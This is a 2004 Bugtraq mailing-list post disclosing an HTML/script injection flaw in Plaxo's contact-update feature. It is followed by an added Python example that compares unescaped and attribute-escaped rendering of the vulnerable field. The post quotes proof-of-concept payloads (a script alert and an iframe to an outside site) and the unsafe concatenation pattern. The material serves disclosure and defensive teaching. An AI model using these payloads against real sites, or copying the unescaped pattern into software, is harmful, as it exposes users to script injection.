Message-ID: <200403121752.i2CHqK8A028679__19923.0955601253$1079117006@web187.megawebservers.com>
Date: Fri, 12 Mar 2004 17:52:20 -0000
From: "http-equiv@...ite.com" <1@...ware.com>
To: <bugtraq@...urityfocus.com>
Cc: <NTBugtraq@...tserv.ntbugtraq.com>
Subject: PLAXO: is that a cure or a disease?
Friday, March 12, 2004
Having a firm belief in unnecessary gadgetry, we recently sent
our most senior colleague Liu Die Yu a request to update his
contact information via our plaxo device
[http://www.plaxo.com/]. Checking back several hours later in
our plaxo web account we eagerly selected his "card" to see what
that update might be.
BANG !
<input type="hidden" name="SetReplied" value="">
<input type="hidden" name="perm" value="1">
<input type="hidden" name="saveChanges" value="1">
<input type="hidden" name="close" value="0">
<input type="hidden" name="Biz.FullName" value="fatcat">
<input type="hidden" name="Biz.Title" value=""><iframe
src=http://www.bloatedcorp.com>">
<input type="hidden" name="Biz.Email1"
value="fatcat@...atedcorp.com">
<input type="hidden" name="Biz.Email2" value="">
<input type="hidden" name="Biz.Email3" value="">
<input type="hidden" name="Biz.IM" value="">
<input type="hidden" name="Biz.WebPage" value="">
He had taken our entire contact list for a joyride supreme.
Trivial arbitrary code injection into the plaxo user web
account. While it does a good job of attempting to defeat this,
simple input in the recipient request for update field of "JOB
TITLE", gives a real jobbing:
"><SCRIPT>alert('boop')</SCRIPT>
"><iframe src=http://www.bloatedcorp.com>
Needless to say should you receive one of these irritating
little requests, you'll now know what to do.
End Call
--
http://www.malware.com
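
Added example (not part of the original post, and not Plaxo's code): the hidden `Biz.Title` field shown above, rendered first by raw string concatenation and then with HTML attribute encoding, with the result parsed to see which tags a browser-style parser would find. The function names and the benign sample title are assumptions made for illustration; the two other titles are the inputs quoted in the post.

```python
from html import escape
from html.parser import HTMLParser

# Constructed sample: one benign title plus the two "JOB TITLE" inputs quoted in the post.
SAMPLE_TITLES = [
    "Senior Engineer",
    "\"><SCRIPT>alert('boop')</SCRIPT>",
    '"><iframe src=http://www.bloatedcorp.com>',
]

def render_unsafe(name, value):
    """Concatenate the value straight into the attribute (the behaviour the post shows)."""
    return '<input type="hidden" name="%s" value="%s">' % (name, value)

def render_safe(name, value):
    """Encode for a double-quoted attribute context: & < > " ' become entities."""
    return '<input type="hidden" name="%s" value="%s">' % (
        escape(name, quote=True), escape(value, quote=True))

class TagCollector(HTMLParser):
    """Records every start tag and the value attribute of each <input>."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags = []
        self.values = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.values.append(dict(attrs).get("value"))

def parse(markup):
    """Return (start tags seen, input values seen) for a rendered fragment."""
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags, collector.values

def audit(render):
    """Map each sample title to the start tags parsed from its rendered field."""
    return {t: parse(render("Biz.Title", t))[0] for t in SAMPLE_TITLES}

if __name__ == "__main__":
    for label, fn in (("unsafe", render_unsafe), ("safe", render_safe)):
        for title, tags in audit(fn).items():
            print(label, repr(title), "->", tags)
```

With encoding applied, each title parses back as a single `input` whose value equals the submitted string, so the text is stored and displayed without becoming markup.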